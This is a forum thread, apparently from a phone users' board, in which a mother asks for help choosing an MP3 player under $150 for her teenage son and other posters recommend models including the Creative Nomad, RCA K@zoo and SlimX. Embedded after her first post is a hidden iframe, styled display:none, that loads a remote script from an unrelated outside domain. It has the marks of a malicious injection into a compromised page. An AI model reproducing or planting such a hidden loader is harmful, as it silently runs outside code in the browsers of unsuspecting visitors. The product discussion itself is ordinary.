+ Reply to Thread

OT: MP3 player advice needed

My son's 16th birthday is coming up soon, and I'd like to get him a new MP3 player. Something decent, under $150 (especially if someone here has access to a discount!), with, ahem, his requested features:

-- No CD players, thanks. [don't ask me why; I think this is a great idea but what do I know? I'm only a mom. :p ]

-- At least 64 MB (128 would be better), with expansion slot.

-- Radio.

-- LCD screen

-- USB.

And, way down on *my* list and strictly optional, a teenage boy's delight: a completely useless ("but it's so cool, mom") remote for a device small enough to fit in one's pocket.

Figure all you geeks... er, nerds... um... techno-mavens will have tons of ideas, and anyone wanting to write me privately can reach me at: mp3advice@writerscollective.net

Thanks in advance, guys!

Lisa<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    The Writers' Collective - no shared royalties, ever.
    www.writerscollective.org

K@zoo

I didn't want to spend a lot on a MP3 player, 'cause I was just going to use it at the gym, but I found one at BestBuy that suited my needs. It's called the K@zoo MP3 player, and it's made by RCA. The 32mb version was $99 when I got it, and I believe they also have a 64mb version for $129. It has an expansion slot to add some sort of standard memory media (can't remember which, nor do I care).

It's USB, and has a LCD screen. However, the screen only displays track number and time, no song artist/title info. Main reason for that is the unit is TINY, so there's simply no room on the screen to display all that info and still keep a reasonable price point.

No radio. No remote. But the sound is good (in my non-audiophile opinion) and the batteries last a long time.

I'd check epinions.com as well - there's always lots of good user reviews and pricing info available there.

Good luck! Be sure to let us know what you eventually decide to go with!

Yeah, I wouldn't worry about the soon to be lost remote Lisa. It will be lost. I know I'd either lose it or throw it away. Sorry I can't help unless someone can find you a deal on a Creative Jukebox. I do think there are sme [inexpensive] Creative Nomads that would fit your requirements though.

i300 knucklehead
    I have owned a Nomad and a Rio 500, and I liked the Nomad better. The FM stereo was a nice touch.

You can find a 0MB Nomad occasionally at places like computers4sure.com, and then pick up a 128MB smartmedia card and have a kickin' mp3 player for way under $150...

The 0MB Nomad is the way to go I think.

Unless you want the best - then I would suggest the iPod

I just bought a Nomad Juxebox from Best Buy for only $149. If you hurry, they still might have a few. It seems Creative Labs is discontinuing the blue model for the newer all grey one. According to the Best Buy guys there is nothing differnet about the two except color. But be aware that this is almost true. All I could find out (since I am not going to buy the more expensive version) is that the newer, grey, models have updated firmware and software. You can flash the older (blue) models, but you need to call Creative Labs and have them send you the newest cd. Apparently, you can not download the file from their web site. I was told that I was going to have to pay $40 for the cd. I talked with the CS rep (definately not Sprint PCS quality) and was promptly help and told that I would be getting a free copy in a few days. If anyone is interested in the cd, please let me know and I will find a way to distribute.

Hope this helps in your search...

homer

i300 knucklehead
    The only problem I have with the Nomad Jukes are the fact that they (and all other mp3 players other than the iPod) aren't firewire as well as USB.

How long does it take to copy 6GB over a USB connection? I know it is almost unacceptable just for 128MB over to my Rio! Keep that in mind with the larger storage mp3 players, at least until others have Firewire on board.

I can copy 2-3 cds worth of info (mp3 format) in under 10 minutes. I know it's not firewire, but it's sure better than serial.

homer

If you don't want a hard drive based player, see if you can find an Intel Pocket Concert still sitting around shelves somewhere. I got one a X-mas for my wife for $200. Their discontinued now so if you can find one, its probalby cheaper. 128mb ram, fm radio, lcd screen with track titles and usb.

I know your son don't want a CD/mp3 player, but I have seen the SlimX and Its sweet!
    it has, Radio, long battery life, remote control, upgradable, and super thin
    visit http://www.yorch.net your place for Pocket Pc Phone Edition Dialpad Skins!

Homer, I'm interested.

I own the Slim-X CD player and it is fantastic. Super thin, super light, came with LCD remote with song title/artist, backpack, etc. Using WMAs I can fit 360 songs on a disk, plus has a great FM radio. highly recommend it unless you son is hellbent on one of those flash ones with no memory...

I'm looking forward on buying one of those myself, my history of MP3 players are:

Rio 300 --->Philips Expanium---->TDK Mojo

The Mojo is cool, but is tad bulky, but I have read wonders of the SlimX and It does look cool
    visit http://www.yorch.net your place for Pocket Pc Phone Edition Dialpad Skins!

Pat,

A good fix for that is to get a USB Smart Media or Compact Flash Reader, it works alot faster then just pop the card in.

Originally posted by mjorange
    Yeah, I wouldn't worry about the soon to be lost remote.
    I'm with you, Michael. As I said in my initial post, a remote is my son's idea of cool. Must be genetic. :p

Lisa
    The Writers' Collective - no shared royalties, ever.
    www.writerscollective.org

Originally posted by mjorange
    Homer, I'm interested.
    Let's start a PM and find out where I can post it that you will have access. We are going to have to wait until Monday when my DSL comes back up, but we might be able to get an FTP session going. Let me know what you think would be best.

homer

Unhappy MP3 Players

Rio 600 best player for the $.

I don't want to start a war here, but I would like to suggest that this forum stick to topics about the i-300. There are plenty of other boards out there for non i-300 stuff.

Peace.